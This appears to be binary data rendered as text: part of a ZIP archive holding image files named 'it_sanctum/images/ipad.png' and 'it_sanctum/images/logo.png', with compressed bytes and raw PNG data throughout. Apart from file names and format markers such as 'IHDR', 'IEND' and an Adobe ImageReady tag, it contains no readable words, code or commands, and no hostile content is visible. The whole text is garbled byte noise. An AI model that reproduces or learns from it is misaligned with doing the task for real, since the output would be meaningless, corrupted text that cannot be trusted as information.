EN����[�+ *�M@[@{@p�^�==@)>�&���4������@�u���۝(;���.ր@8����^`]���J R��d��֙�-էP�@uPrӀ
V��y��t���v�s�5ڝ.Q���Y0+�)LJrWJ��]�DD�r��k�\@�}9/��@�q�;�:L��_&p���b����ݯ(���H����a�Vܳ�wWb�����|��0�@(�(`:���'�f����԰4Mi@"��6�&�N�����
W(������@��!���7Cx 9�P鄁�>�4�T
[���a���L�
fN޸�������9�(@C���|�����@+Y�(��i��-��&� 4��5n�Vԡ�:-ݛ�3��!\����ڭ���߫ٽͯe٤s�wn�G�$/���M�
�M�� 0��S��� 	��ݶ����/y�wffq&�@�w���
��q����������st+��H
k��z�MҺ�(��]�x'�.�7GP9�n���`in���_��3(m�9@K�@$������6�`��H5���	��/�@Rm0���mTLO�   �8�OF��*Rl �-\��ۜ�N�@s�WHX��i:B�4Kjx�&��0�f%k��kœ�H	Z��k4Ҝ�R��R�M����N ��m�.X�~�āS�#@s�
\�V�E�C��߀�L��� -ٰ&z�y����&i�n@�^�	`Cs���
=@t�2_=hڪ���:��V�LCy��CX�(l�qDŽ����I@��0�3�P"��y�Ā������@]�`�k�i����Hs�1@2�yS+v�'��-�7F Mβ�q�V5�PlW�
_��t�JӐp4�j��ŀ� R�:����s�y�V�ά
�K���T\�_$N�"zq���P�֮nk���MBT�j�]�U��R��Z��z�`p����vn�j����P1w9���rwJsX�	ݘ	\���n�8���
�%�&@RL�.b$��u9`4�
M���6��	���9�����"jL�V`a{��Ձ
P
��%p�J`@�����@m��
q����	H�@��_	�<`)�רT�,sW0W+	���R|�����m����x�Ӑ��@	����X�{��&�d�1�51 NȨ	��-Ր)_��m<��3�{����5nY.�w��� �U�����`9@V��rN� �_:��(ހ)`�p��@X�`(x��@`]�W�	��@T�R���P4R�@T��
�P	��	h�y^htS 	Z���Hx��@xN@	�t�����*,-s��@%���6���m��c�	N������q5���'�
�6��5t����d�	�	�@6�� R��
R����J��w�a���h6�`=��`,�&�b�@߳�v:�H^��Z�e���]mУ�v���*�9d�sT�������W. 502���<�@@:@�l)��<��>`@����wmv�.L�v�ڣ���}@s��p7Y���wt��_��*��2� +�	[�tF e��\(k0  H�'@x����@0I������:h� @L�����@~l�T���&����!���@S�\���6W5���:�\�M;r����P!��@R'w����*�@9���  O�0@� R��S�Rj��E�d`U*Ӏ4�T�IuB4�� km�:�����]���x�
���	����h��0�T�>9�b����5`��s���We]@͸�0)I��ǐ.@U�G0��
W@	�8����N��e��Պ��rOD��w-�Z���R�ar�V&�v�
�s���
���I��wg��D�hw6���|d��D���h���Tr�跼�o�e�/�v����V�u�m^@g�%�5�w����䡼`�Ju���
���@M�
Nr�0��܀�%���T���kD]p �M�-f&N=��@ST�;dڀ
0x�!���q�M /@	�����@��~z�ug��\��0�р�À}�X&�8���0�-� -r�k�@&�)xif������m�u����h
%���Z��x0$X��@)� �@&L@�%��@%������zK
`(�@�e@TZ��m��0)0*US�4�H���i�S��c�[�
X@Z��8p�9�	ӥ@��	 \+��v'T�!/P&u�
�0&��R�{���9.��2w�<@�	��S�
>`)hXw��i�s=���Ni��ԣ�����iD�{����֯5��a�/��z�Mq]m�/%[�NZ��
�֥KR�w���������K�P{W�K����Jt`Ow�*{u�*�@�m.[^�=�a@�d�u�kr��l�
P�	0�-^=�L����r�&@$ݔ��P�R�`N='JK�X
�$�]@��	��1XLM0��j����@z)�� )^`5P�@ZPP��	��
P������	��>`���*N�J�V>` ���R  Kp��
@Z�\��a�
RIB|���J�|�`om��`]�(�
��9P�`0�J��˨<���>@ �*�@U)�@%�03�	�k�:�=�o��ܞ>`5	qXݳL��	���,r��|���c��&���C�5Y(Ϡ	�. 8G�
u�N@9���=%�'��	�9�+�r;�O� �)_�t���jopw���q�.�Pj�s����E���s��7)z��߱XӶ��3We����t����@3|�gP
�L�
&d�@<%��N@9��UW@$��[k��dJ���ڿ��Q���ֹ?�jV�n�~�Z�``���^Z�G1�:yWZ��l
v?���|�kလ��4���G�@[��@k4@
�
i��T0(4 4����H	���Z�5@�(H�	h
X�O�`0�@	���z���J��{�9���~�0;�� 9h
-��@v�s�
]������ܩ��
�;?��_��������;U�@N�k��	�U� 	N=�(N`U���<@�v�`Mݶ���q������' S�komݜ��
U<@�{wf� �4W�u`=�]�!�-��.���nY������P�E-a�
�jW@0r��*@$)�L` 9���8��	����
@����$�;�$��}��i���o���� �;��*��r��T��`.l�0	�l�L���I�
�@Q�k��X�$��N��vX��o 0W�jw+�XܻnS�s��۲�02/ 00{@6N`=����p힀k +�MH�r4�x�!��
���X  0�sRh�`(�:���zx�'�L
����ӏ����X�jP�
@&r������P�*9��qs��	��Pm���Yb�om�P3��Z\�@ݥF��q�&X�������{�h�;� 
������E�����]8�p���`r�ٽeM@�v‷
'���+�	�sP[e�`����L�E&j��`�Je,@ɩ����E�Ӓg�N���5�
@<�$p����rYH+�7�7g5]�.?s��s�[� )����mM�H�
�)+> V���ޠ$�����kT���Pq�	����	����K�@�pr�9��Ɍwv�7��6������\�^H�Qښ���
�dBڪ��
��iG@=[S��j�dW�� b0�kus_n���$���1�*@{�70
�	���X���֯!��K�@  =h�$�	@0	���
'P
�i��~ &�S��	` yx��p��V���MCR���]�UK�
w`=�(j4&չ��]V�P)��+,�> %۵9nt�*歍�Z����`Z��[��h�la�
!%[S@K���j�;qX.�]T�n���=���+&��YM,Q(w(��ט����������	���{uW%\PcbH�bn���0��*m���
��P0�[m�ӣ�v8��Vp�
��uГr����$��S�
Wc��د����{��E��;mK�^�E���M���r\�� L��@s�j���`v{��i�@�-�╹6?׽c�P�lj���V���
w[T����[0����u"	�U��8=@{�i��RK0[��րH	�O@	���Rs� 	@&�SH��w5@im��oMD��ָ��2�YkR��0k-���` 
���`
d P���iP&`
-`k ,+���{[�T4��.S�i�{oM��-�NP�%�'��
ku�4=�4��`)�q��)�r�yH����S�
@��	h�@z 8` &����@R� P����n��:�O�āS &�@R��' 9�=�)`
rϐ����-&��ǚZh	��@�_H]�,�MhKk�	-Ϩ�m�;��7�iX.�[o��o�]w����`R�w��1@m۔��:�R�ŷ��2n�@��4�3R�j�1���7=2��p��N�x�������m{Ҡ�M�B��V���_m�^�J�
����;Xo�Cm���+lP�@K�@�rЯJ@&�N�"��>���;n]@�5V�ݐ| 4V��kP:�w[�%�T
�#>�5ݜ��|�i��ĕ�GPZנ���@K�`g>k�J�UX֪�#0���[�v�n)���h�RO@+p�
�����t� 9ר
xO�/0	����3�Z� M��Wj�EP!P	�"@��OF���@
���X�}�t��e*:�@g��a�]@�@�'99H��xc@ZO� ���F�m��
���et;��h��ԭ�(��ugm��_ܶ�^�I�[�=V@C�X�=%��X02��@!�@�%�'�@�w���9�Wv�uN���+a�(�Mt��8`��>����>�Ns�� 9�@R�	��S�0 N  
�N+ 
� nQ@$@0*M@��Ϡ > 9�L` p�I�@��
Q:��m�.�9���&@1�j 9��hx	������U)����ݫܹt@u'<����P2�lE@�t�[\Xu�Vq�+�M��㮠t{6B����ٱ�9�����,
-xhm��q�r�1]�&�`au�.�4��� �ʄ���5w+�@E�Z��4vYr�@q��jt@	M�S��,��j�W�[�W&����K����c��MF<@-�̤���f�Y�L��m�XUR�n@5j��o 3v�߷b��Q���c�"���wm��%Z� �ݴj�\�i����  j��U�����#��&�8h%ʠik���njr[mOݞ��D��CSh�,��Q���@@0*�S��������l
]�����=��=��=��@߱�w�������(V��n�$��D�e*�h��SM�$��\@�ٻ@5������:.t��9^,��	_X����*�� 
�� ���>�] ��
�� 905��3����|�@/���J�p� &�@5����%&����P(�� @(`CY��@Ku�5�`�i��x�@k����@�[���W4o�N�^��~s���`0 �S��׀�5k�V���?z��\��c.@�tc��?��Šj�k:���a��{�MʭlkZV��MբGݢY�������b@7W%�������J��ﹸI�-]�YT
\�5P9��
���~ L�@�l	`L me�1k{�P#��U�f:y�&�^@_���6V(��Ϲf�ݯPn�@7 "�VCj�V*�ɥ(Q@R��	��� r���0*	�	�U�,�+�`Zt@RƠ7
e:���@@
P
���� �`�����uU|(��݌��s����o3lX����7B��2wOP����;��sL��I��)���Vٽ�wa�s��'^��.�u�4�	`-�g�
-�ew���0�*��@M�+O9�K 3`)��-�p'�@�ˎ�gu��Z� ����Ā��
�7���� r��` ����P����H�:�I�@-@�i� g�������W  X��(
H �S���> 9�ԇP"�&� �d��`9��&��P
�)�����ၥ�!�V�a`�@�Z���'t�;�.��`f���<p��������	��Ht[;�sk{�
7$�(lw�JJo�T@[��Gd��֨j(�`q%t�6�oqX�-�Z@'��Ś`d��(�ހ5s��5����@2�,RkTm�
9���e�m^@��m��01�̸	`]���d�۹Du�m+U��0����ƀE�m����ڐ&������� ��  @x��eM��Y@W`M�/����������Ke�s@&q5��h�@eu�`KT��,@t�ā�u$��~pƸ�S LU�=�,��+�������Gj�T��W_�;s���<�@4��,�������j���h	��@f�oImz��P	�.@&z��v O��k��J�	�����H� �i�
> 6��� L�۟��h�q;X	'�h���
<=@r+:���1�P~<�Ϩ���$,X�	`9����' 4�rNL�lt�:l��R��ܻMK���ފ*���[;��F��]۔
ܜ�W�����`���\�濱k_ƌ���jr{?^Կ�m���ɯ�jf�^��z0&�՝��/���vl����[r����[gmBI�`*]�D���t�n�K����08ڹ:�
\��v�5(
!Z���zm� E�5s;^8 p&�H�n h�r��'l�&:p@!�����k@"�1n@N9I��@�'j\���0$
'T��d�	(�q�	���h�j�-�́��G� ��@T�I�D��ݥsw\�%D���@1o  	`'�O�H��.ڜ)�4�v���0%�$�@'0~ 9@CrG
4�
6��J���d�1P']�0�PfB��`9�0	���|��R����'n�(�X�<|S��+��+g�
����	o@�  �&��� )�������� -�r�`iM�f�T
V�X�����5����@ .�M��J���3w�"r'P)6���_ j�T`Z�^ꯘ殷�J����p��iH
�5}�ܗZv�@��m�p�q�s0���q�
���P3�Z�t�09-���b�>ӵQ�K-ܥ��b�/=�mc���v ��z�1�|@�O�:$�۫�j�:��	>$�`]?�7[�M�79@d�X��܀���	��% 6���yP�iK�)�j���o!�-T
�ڹ�
,�%�H��Z�����&����
|�'�k�F�-�
%�@Ӳ��;q�m�������@'���KO0���d�� Ky�@<�@RT�R0nH	�zH��$ F�/� �j���`H@��
�� 
��@`&P���u_0@`Z��r��
���q f�q�@Z�y�Ӑ��@3|+�k��0
bi�%���y�v�����tE?@�	�u9��)��J�T�	��P-H���P��f�d�v`M��d����<$ݖ5�^�.�Rq�����(�P���Ǯ�U��5�S�uю`
g��Հ4[�f�P8��0�q�!āhfQ��=�����	����Y.��	H����<�d��w��`@hրʘ�_�Ơ>`R���u]�I��e h�^R�v*:V�' B۟@3�O4����@!n�1�e��$
�#���te����\p8X����I� ;-��g������ �Î@.X����sO0s�� c�<@@i��?�6���{���@u� �0����<�@0?��PK!����it_sanctum/images/ipad.pngnu&1i��PNG


IHDRd���PLTELiqUUUUUUUUUUUU������wxx��흠�m�G�tRNS@�p�G�:IDATx����iA���(X@J0z`R@:���6�Rp��'A����/`����-A��-Jl]?�y,yـ�O�M��"�f<7!��7��o�E�8�e#�~�-�ɐ�����ɟ�����������������������������������������������������������������������������������������������������������������|����U��|Kr�5y;�r�k�ך��KG�ս)��#Ly;��^r�|O�*��-�G�'M��ٲ�x]B����l�xQ�{z����m"�7~s�IEND�B`�PK!��?�'!'!it_sanctum/images/logo.pngnu&1i��PNG


IHDR���X��tEXtSoftwareAdobe ImageReadyq�e< �IDATx��|Te�>|M�5��			z���b����v]���bYQWDtEP��{�B �י��>�g����������7�!�ɜ3�<�}_�ݎ ���?�-Zt�]w��޽{/>|x�Ͻ���!	��U]'�$B@B.�A������eDDa�Z�t�Mp	 ����ѣ<һw�ғ'O���k���Ͻ���wރT�\(�H �X�FRR���zd�_�葝�F
�F���^cL��ҕ��7�S�?���w�I9�������&�s�w��-����y�h�Ţ��a� �M�-z�ع�k���7q�e˿��۫�*e��ջ��u���o:x���ш=zT��1p�_�~́�,X��k�m�q�F�͗�$�.�BZ��n�!`�r���6�M�l��k��e��4﷿������m�X,�g�}�999���L�.����:T8mڴu>��?���TNL��ڈH��Jm�:=�j9�B1�
Z�HN �ءKL´����px=�KW�@~�mŊ��^oք	���@�?����]=f̘]�E�o����?�ϕ�)��e�Ѫ�#�Q�lŢW��o�L䦧"�!!6�����hl�@(
� ?������u[�t��$Ή��R�د"?�04x�������e�k�F��RX�V$������ʯ�a%��L�K��C��>�����5�	���)��[GG���ɓ}ǎ�Ӊ~�����˖-�H$B�������PSW�!��A����
�ݯ��D�I���� �U��nw���^����d2��J��u{����x�gΜ�^��^���v���6�$}�e�oڼybiɉ�!�SQS[�Q�ܜ��G��ݧ���f���Ve]v�D(�2H}R���p�䙨�F�{o��'���8��X���@�����^i����,u��o�}_^^^��ٳ�3����>�=�-݂P(İaØw	��?���r巳6�_;�ıC:�lIbI7]3�G��7�V�"���u��*�Ԕ����R��s6�ַ��
�(ʊ�����XC�/�)W8H��@(���]�`����m�6��k����p̻���?������K�P(���� ���}�";;%%%i����lW�]��[7o���C��S��2V\;s2&O��t#�2R�i��P�L|�|ٜg����v�R�V��r�"�N���s_���?|;�M*���"�A�p"�V�����Y}i���������<�����^�z�2dH�/y����qqqX�v-���
$''����ϟ���!��X�j�U�~��N��H0f� ��+0fx�&�@)��eC��	��k��Z�{�	�_�AZeeSR��
B�g&C�����+W~wqs���ǣ��
BAa  ��L*�-9U �H��PP(W��:��k���EB�L�R��v�]�hѢ�آ?~�vV�A��;o޼��y,!!!e�ȑ{�������:�c�;w�9�?�8�Ϝ#-,�_�Db�>�&�5��߬�n˄�_��j���#�V��!'��n��z�L��!xn�-N���G�Q����p�zLU�?H�|��O���ɂ�txZR)�N7db�b)&���3�݆��q�ρY^�^z���3m`��gX$�RW(5�\�f�*zM�]"zӲcks�{T&&%���q��ў۫�̘gI1h-��O�8�;V�hGkkkQ���Μ����L ��~:TKV|���LJ�\�CTN��h��}��,z�t���+��Ӱs�^466a�!��m�9�,򃿝q�u_�Y��-�ʁC���C���W��`��x���p��!X-V�B8\.d�'c��Axh�5H҆Q�T���x��~K�`(�&5D2,6'�r1^�	X�>䥦@�:�I����Pthk������@���Miok���1�.�nG'}�:�o���p�͹H��Ń�>��/ϸz��D��*����kllL��;>%��;cƌ�$�{�׮��jL�8�/��?�~v/[�l΍7���u<uuuq5���J�����:d(Ѭ�� ��2�m�͙�o�O��j��u��
�O��M@yy}�	k7nFMS;��	�Џ�s��"���C0�%�H%��Mx��oPPTkK%���+PK\�=쐙t�K
�9���-��Hu�%�=�dH�+w�
���>}N�ĺL�@(D( D$��&�H	�N��t5�ojFcK*��~�� ���9tİ�K�ޜN�p����/�ܧO��eee�fϞ��޽{G�N�:��2Ξ=��
�����ӓ�����ՁI��Z�2)��J�E��76�o��/���6��nU�)=�Ns"�t,�`��ۋ�+*`0(���Å��z�:t�T�}GO���^�'�>�B����"^�/=���$h$Я!��w�	��������?4J1�
45�E~Z2��i�Z�ǫj���L
bMFę���TH0ꑨ��K�L��BEKB@��z���c�*�l�>�@�	�Z���Z�n�5S�N]E)�߿ϯ���W��…�|�r��%K����[��	Tv,+V���}��q7�|3�u��n��)��o����^O�*1u�u�k6�78p�uS1m�D�ޏm�`��+�R˻?]J�ڏ@؉����^B{K�k����PR��߳��:��!;+ii�8t��	:8h��dF2��Ƀ��
�d��=��!��K	�ڭ�ِ�{*�-��?��/#`�'���N�P��d������FnJTZu���K�W��_�~&-Ɩ��D��w�}G��ʢI�W^y�? ��JsD"Q�WA��@���{������9s&�$~e��kj ��s'�"z��Η��峡ga:Q�<?�z�����X��������Kϐ�9�8�cG���#�v��pvGm��=��#�"&&�)98\Q�R�J���J���JD�hRRL*��wA
��r���B+CJb���+L�48r�l�:O�(`C8!j�'�F��BY-{�͉Y,}�a�R��IJK"�����Z�����o�g�7�|�<�&O���cǎ!cǎ=����ОC#�**{���O���X����Ӌ/�H)	Y���Nt��C"C�C�_(�Ao"�E҈���ظc&��=ӱy�1�)�U#���'t�	$6�i�b��R̜>5U�0�_z��ơ��x�ٍ� �2�V�J���%��i�D�>^R��O��ɍ�����>R�CFJ.
���FuYk���H�T���/ � mBzH BD@NL�-,�6�eƢ0/�	z��RHD�~�%����ANH�*�Ѫ���~�9�Y��-�ӧO���D9ȣ��r�'�|r�OHMUm���,��@�|������ׯ��-�J� ��*�-��A_z]ͨ1(7\(:۾܎�(�E�1&�ȁr̚u�{gb��(��0����-7_�!��AC3ˊG��H���>��\���{7,�h����:8�V�;�h����2C!S���>���b��31��/��+S�F;�)��EWsp�.��$G|$ܣY���,$�\��a��uB�<�?sc� 0_~��Ǘ-[6������lD�X]
ģJ�_~9V�Z5k�ҥw���l��-v�����W^���q�����^��蜇(
��
E�"	�|=K��XySm&OA‰�ѱs(.���8TV�A��~}9@"%!_����F�+���M[�Ѳ���g
��G\��C�K�$�KJI��8
S�X�.f8C$Ń.��H�d�&!]�$c"N(*��^y�(2�������ó`2�T�w�XY)	��hT���_��wB����1̚Ü��O�8��/��tQQѩ�{��z�22���{�т�$���i�L�|��Wʕ+WN�5k�d��m�I�pP�}Ö1/���ӗM��d��-�p��:2HWL�%HV7!6�%��Z`J�!.?��*�iu����޽Gy�t˜�x�ݿ��w�g�i9JPRV��3n"Oq�*�Șw"N���7^C���ˁ�D��Pq��"��'Q.��"	t�a	u!(�B���l�����������ƈ��$�rML7:�_�S]=n&�-f炄���V;������ ��#���@��t��)�u�5�+ T�$�K�����G}�]G������t:�
7�ü��|܃���"!!A��c�������2��s��"�?7Ͻ�s�FM���}��.�l��n�ق	E�Sh�V*�~y��P8<;�ۅ�Fdg�`��RG�c��	蓟�}�����"�z<?<�؁=��S�Gf*Z�N�}����!X�#�HS�c�ֹI�G��%��Iu�^q�E�XZ�0ɵ�]dpv��3d�"�lm#O�����->u���9�1h3�#�&h��w�LtN/�sC�����(lj������Δ���,��Rx���iӶ��ȪgY�`}}=��e!�`0�,X�FUUUVuMM���͞��ۿ�lw����sU�?�P�� 6�h�X8�
3��т�'�Z茜�dу��6烕A�7��hC�P��ɳ���E�l��0C-h�X@�A���j�H�|�������3C�����=�ȋ�F5x<q�j*롢�d�G���/�+�#H�	�i��L*#�'&%$�C
�#jz��
	�w�KN~�[��X4�7�ǩ�����W;QK}	}g̤sX;�����1}�W�}��-ȭ�w�����<�@�I��kX�R{{;�`غu+��:<d�Y	
�۷l��?��S�Ҝ�u˯���W���n�R�K)�S���<���<]]lٺ����WIJ���F��'��.V�� H�W@:D�+���yRH�4D[ ����Ҳrm�K���!���KR���Ƌ���%/�9������:`���S�ⴝn#�@��TPHB[���"z�������#P��Hļ�J��w p�7h1[��a��(Ebh�R�{H��C���ѳ8����U5TBI�97/���ymͺ5S�{�r���Ə>��}�M�4d�]k7nw	 ���r��a1�QZZ��7r�0ϢYl[@���z$�K�]�w�����;V�Ŏ%�-
��q�-x��'����B+q��1~Z�z��0/"`���{	 ��v�B~��
�D���\P��H��™�J:6�
��;Qz����e�I?��K9�A>znO�N�r����2!�?���.ddi�BՉ
,$!��u1DD��B�jP�W�H��4 �K+"��2J�Ԡ��
.Fb��X�c��O|�
8�"�bzyI�+=���
DYeC�^���*�-^x����x��[�5e�G]>e�a��l۶m밋��n{�V�%��L[FFF-[��b�����B9r��d0��F�)#�

)g�ʳ�W�s�;��K��u�%�߶�l�G��N/%z#BW��`1FC��Ђo�hCMM
t�ȴ	{MB��pb1�
��e�Q��F�̈�{��ނ��Vdf�@*Vb���Q�C�=!�)����hu���I@�Ki�;IS�iM�!��@v�iI�l�h4U���A@� 	j�W�h�Db!�.H^�K�Da/;�#�(���*�=Y4�+�� �G=����cGK�*@@k�wA��}��Bf�w̿�gN���<pᖫ'b��Ex���Gv�7a�e[�ͽ���.Uk�A�����i���oea��Q*�1Xdi�ʕ,��=IaA/N��۰nF4�
���8��ّ��:�՞�H�_dIĩU"νU���Fh:�DrX�V$����D	j	 Z���e88X5L1���OAA�o{��EgH�����;��gqX*���*���C�Y�F���zGO8�k5�)T8u�Y�ĊDZ�rDh_�΅�+x}d�%j�$��_� �1���hd*��S<v<,p���Ļ��A�SK"���LD�?����评��T
	D�q��[v�!��e�i��voĉC��⳿A�c��a%{��jC�٣�[�p��Spd�b�w��G�-���՗���������ԩS��%����{��޽{���ʽHRr2��ݛG���H{�Wg>���C�o����Y��@� aK^B$n�Eb���)��i��D�J$Dy�p�1����X��Q<F��ֳgO�P(
D�@�]�����*V��6�A?����7����F��b7�2�H�p��<��KHbH_H�j�K�@rv!ܤE�,^�M��v�w��B��g��W���^���}���f^�y>F%r\^����(r2�a�ix�C�
(��a��E�yI��\���:!����Qo&0˸Vb�T$$�㳡��XQ�S�߄͟�=R5���]�����7�>}&��j�.�'n���\ݲQ;L���.�-�˽Ȳ�l���YQfu��a+������76�&�yFc�@A�]�B+�8�0��P_ގ��V�3
�ܱ&j�QU]�ȢX,���-��G����
�)�=r�#Am�٠�*PVr�GΡ��aP�%H�JFu];�.���ف�{x�V��	g6|ڇ�ò��s7�?�
�#@'�yhb���O����4���eho7C��C~^.�>��.I�1!�Uʤ�t�᰻�����%�=�|H�Ȕ2��oh��U���6���%��Ft7"�g�+�L�O@����/��a�^��H+��bHdB�>i5����92b���7(w��>����ԛo�{�%��od������<a�p�MUhЋh�����Ԋ�D��X��q�7��#�����@ #���B����q�u�,�F�� ��QT�[��ؘ8��~�@�GjZ*ohbމY���h0� �"5%I���?0�߃S'����Q��W@V�\T�נ��9�)HI��֍�k0��'n�s.��O^�ן�	�<v'S�`'�n�<�۸�ާ��q�tFN���5�Y��BH����{;D��)Q6-y9��l<y�8� x4�􇘨�Zi@[+.��YV�B[L��䈀(��~+��%�3�C���bG��3g�BjB�OP��h!NCD���Up��M·H�ACU9��Z���غ�
���T>�O�4雓%�����tH/%
�v���„Vw�Dg��O�p��H�DUe5*�W��g�S`���(����͊��(݇�ց�Z��MAz�	%[!+.���ں�u{qt�1�$��NI�"wtt�o�AN�8���Fa�B��ZzBn-9��\-EA^��,'z+�����m��b�d�c�m��h�]�F�E����Gə�Pv���n.r��E����.��{�>�8j�*1���I�z�����Ch�d�)�
�a"M�%��y�AL�G���7]�P�H4�/g}.2y#)�n��g!`�-�'��o��Fԋ@# %&�% ���Ǡ�֌߿�L��;k2�&����w��Rs�Y=�zٛ�x�r�~u%q��g^uդ�.�S�R���ׯ N�[��ږлw��b�Z(���NG�Ӄ�'�cĈ��Hǹ�2�]D����+��~�r=�z@!;���
HL6���s��	q�8�,�r��	L�2�ӹ��'�u�Va�q���cƌ� (����J��k�`��5��Y��Y�l�d�~�V��8��}���W�|>��ރ������Ų�HO���W�(;��%��b��Kp�����Nr�x��u�;�/�mm�7��#$
"(r�$&??>!dr=�)!3��)	��$����b"T�,�13��HxB�i!����o� 8F��^��`��Q��kPL���C�������>���&,\p'�ɣ�
���Ux��0l�@�v���̺|î�[:��%�n���r$��D$��L3ϴ����,�hPrwo���ɣ@�/"шL(��(�:�Fmi=Q�<���Cy�E����+cǎ8x� �Oϋ%׭[�ӧN�'i�^�z��� ,�{�`�2#5/������Z��Q����8Y~C¤ɓ���X�i7�%
�s�gF��˃����%x�Q�R��Vm|,��3F
�)MI\ߎK_�"�WI���Q1�!���h7J������^�#���fs/�ȯ�0�(^s�,�V蜅�7aޞk���QIEy���U���)�'ʫ۰b��9\2�	>Wb�Th隱c!�#���nC��2���\7[�l�|	 ?I��e��o���F����
s���+*�4w"59��Mey\v'X]�P!���uzaoq�����f+�3�QP��f��y�*;#ǎá#q��W�2�A�J��B=s�jġ��q�>t+��iS���W=D��>���r�<QQQ>���F�^y�k��O��Q����^�;�FeS#�9:�z�@1rTq$�et9lh�5�E�CHގ�#����`=��܅E�"���%�z�o�@���n�%�J�yl@:+@�UH^���
���(�㼌~1/fUZ?�O3�]l0���2&=XG��T��O�Y
��%��md�~��o�U��7[����g�]��mtX��t�z�)ſ���Ȟ={F1�Ɗݞh��Y��0���vz���W����IT�8�\J�"̧
Y�9(�VhBeU�6\{Í��be�5�5<j�2���d��븷b5`̣��v������#�
A���gK?�b�U
�`w�"�
I�)�e�QQUC����WҺ���͂���:���f�6�
N�-Oߊ��sd�O6+�N�aQ--��ȇ0�b�b�$l�	���r����8���{�c��s:�5Y�i��B�Y��-�����']��Z
�*��4�fl��{V��"cR���w
b�R�d���zU0$'c����s��
���1C1�g�Mg���='+�!CüϽ�*z�\:��k������;:b]�Ѕt���֐�f������J���B)�V3��A�YG�&m0�s�p�l?;�w�$j�
�vT�����4�TXi1m޼��{
#v�ځ���c��6U����شiF��@���������"�'��q�y�Vl�s�N3�<�v�VM�	�$�ћ���#��%,!�Y�U�M����
}�H$�ö�Ɗ�d�ì��<�1>w,����@]m���bk�q�b��4+ fv��j@#�@��#!�c��z��􆉞㐘���V��u28,A��E,��>�|uw����J�7��`���V���fD�BD�r��`�꽨nju��ҧ�/��j�e��3"�+%��
9�Eb6��xra����
L�8�����.t4Z`J'��	ТCd�7���)�Rl�.K���gL:|��tG��s�����R2����ۣ�Vn"����'�ibMX�J07b�P���U�B%/B��谷`�
#�0*��>�l6����򑞟H�B� �ⴢ��yP�;�B$�������fy>����a&�;��0� "��j�Z�-�a�)��$�|p�����@$�Ŗ!�M]h�iE�B{}'N76�r��@
�/W���a��<:?��`�b�՚�8��FSˮ�uS�!�g,ڛ��*��D<Y���Z�`�
�ċ������&n����UUWg��l�̃�h��^��60ɤR�8j�kx�abB��tuؐ.I���J�Sj!&��!�Z��w�w/O�E���4��l=��288��[q�e��,=��bTn��i�?���+�`JB��F���ԩ*�P��A �d�`���_#��[G�x�@Hi��x5�z���~��6de!~�������.��b�[3D�R|��N7�a7�{����̏�TB�Mb��f�p|�(�|$�v	z����r�3'E9����$�	��J��B�ODE�K��M��>�>�o��������	 S��5�V�:)`J��=�%>zt�R��W�H$,dň���B� [���e1��Y����E�Y%A)��*	#�oX��&G�a4�-g��8��:�;�~.�>��e&�����;�"K����m���{�D��z�DhS�h�j�)Bw�?K$B�xV��ĝRλY;͍��<"�߉	��,����"<<�/�+.���=7��Ж�hWX�O �����<�	y��aw�?�~t #!'���خx�;1zp��%� ����
T�4�[���ib5�<v4��!#9n{�55�_g�c11>%��|�N(�J�����,fkL��k
z�X+�7	���PX���Ԙ��]+��11q��ii���{	 �9��"A���W�
Yu/��b\��
u���IP�s&Zy��0k�F�tU�QSS
YYVJ���3��-�~��5$��lx�W�=�rrrp�i$e�0�n��e$q"�����Y��%�P�$�[�RY$�{�C$
p�!	/:dQ&�f�
0���(@ػ���oP�Q�0O˓b?w�h�{���xD�y-�C!/#�K�{�1�(�{e���8�nA�C��i �Զ8�a��(��^��A*���O�cq�	�,�)d_��*a��=��:bXo���/3��p����c7s�B�NHJo6�,����sO�!11��? .z��۩�;j6U��?�C�8��� H�`0�Mķ�ub[[S]�(}�tש��P�hvw��%J����������c횵|!
&��i�&dgfc℉hni�-�B�ᄈ�[��	]��/�2F�h��'t݋5���Dt�k�!D�Z�#v�(@zH�"�+&�����"_�܉ ��(�VJ������r�~�����hq��ӷ��7���J�O֥��7��V�����h��(�_Jĉ����Dc���<�G�}������Ϫ}o�}9
zd���<d:%/䊰�+2��X�p��9|��g1e� TW��j�XJƉĿ�UMy�yBVsg���h �[Yצ�m4������
jikKX���cr��zs�q���D�!���o�_h�=�bT�Q,���sl�h�$�{��'i���F�!���7�ԣ�j����}�N�.̼�jlز���R�mu��I�{����2�K�ȫ��’h=i	]`���]��������
����Y"e61N�6�v�0#�ZZ��KX;otWX�k\�񒹈�G~��/�r����
0y�H�1�����0�o��'O��az�H&��Ļ<��y	��=!i?)y=�Y	�z�8:��|�0���ܘ�ih �����ѹ�1y4�6�Rϼ��$�f��(��ȱa"��视<aȉ:{<̨��g?Ğ}{G�GR�.��V$�S���Y\p��<�1�<�k���rK��|���,P��b!O�'�XXX�h�E���/��~�2���)=y�'���*:p�m-�2}F^6U�����%X��_�h�+����7iEԊ3k�~�D�^���t����ꁻ�+	yGg+�OU����b8X�kK5`	�m0�A�������,��	�<��"�nj����|����9p��&��1]���tVS�w����*B�؆�Z��^��Ӱa�)��s�7^A%����rۜ������EYAV_����Ez��O"F)�/܎��F��h=�m���0�gf&ғ5�p�sT��J%�
9��.r�*��Z�Up[:������.9�����'�t�}9pX>Ν-��F7�dႁh��\9\/9�=����͓u ,��:Y�@D�-HX_����k�����Y�8��gN��ܿAg�on�
� �5��Lc����O�7�Q���B��d2:yĻE�\CtIG�Z���v�8r�GjPs�]M]�*[T�z	29qw
��I��z�N,��3�n�=�N��`�ݑ�� ���}��[+�!z�2�b����8V-Y�G�Y�µix�[0��H�=�H�4 15������"��]��������2�*�4��<=�HH(��O�c'i�O>��>���_�`�tzއ$ˠQkg2�/AL|��@��X8�>Y��u��dWˡA�k�LK1b��X��KZtF��'s=�qy��y���G������hr�Ķ�u�������0��G{�Ü����	z	�U�Z�k��:;;p��!��U�g ';u����Y���~��#v��n�LzH���H����zQ]߄�S�p|����v�+��+i�a�k�����و���V\�D�VHZ���Z��fh�U`����pTA����_���|@Hq1/���r{;�I^o�cӑ3�_<��?�<n�4w�C'ԍ�L��˯���C�ȋ5ࡻoF���e)���\���8_��3�C^��G䡵Ձ�ڎh�h&��
�籹��6r�m,���#�C���=�<	��+��[p�?
 g�%=7�0Q���
��!�
PWQ9��.K���D�R��sg�l������3�����S�ho��`$*L��-đ���Y/���SܗΖ-[�{R��0����l3#��ʼn�%�r���O\C�<{֕���S�.={��N�Ȍ��I��m�]�+�O�&A�HA�T�cV��Zx�6=6:V�">�IЋჲ	 @��f�L��m�6v����_U�wGڸ�.!�*
��E��)�2�܊Gqp�6,��Z�>z��
���cH���L����J7�o"����!��2u�xㅷ����(���*�/?��h�Q,Ґ&�E� 1a�ƲX	
